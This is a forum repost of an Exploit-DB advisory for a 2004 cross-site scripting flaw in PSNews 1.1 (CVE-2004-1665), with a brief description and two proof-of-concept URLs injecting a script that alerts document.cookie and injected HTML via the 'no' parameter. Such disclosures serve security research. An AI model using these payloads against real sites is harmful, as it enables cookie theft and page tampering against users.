PSNews 1.1 - 'No' Cross-Site Scripting | Gerki | Теневой Форум про Заработок и ИБ

Exploiter

Хакер

21 Дек 2022

EDB-ID: 24575

Проверка EDB

Пройдено

Автор: MICHAL BLASZCZAK

Тип уязвимости: WEBAPPS

Платформа: PHP

CVE: cve-2004-1665

Дата публикации: 2004-09-05

PSNews 1.1 - 'No' Cross-Site Scripting

Код:

source: https://www.securityfocus.com/bid/11124/info

PSNews is a Web application that is implemented in PHP.

PSNews is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input.

This vulnerability is reported to exist in version 1.1 of PSNews.

http://www.example.com/index.php?function=show_all&no=%253cscript>alert%2528document.cookie);%253c/script>
http://www.example.com/index.php?function=add_kom&no=">%20<font%20size="20"%20color=red>%20<b>%20WackY%20%20</font>

Источник: www.exploit-db.com

Поиск

Exploit PSNews 1.1 - 'No' Cross-Site Scripting

Exploiter

Похожие темы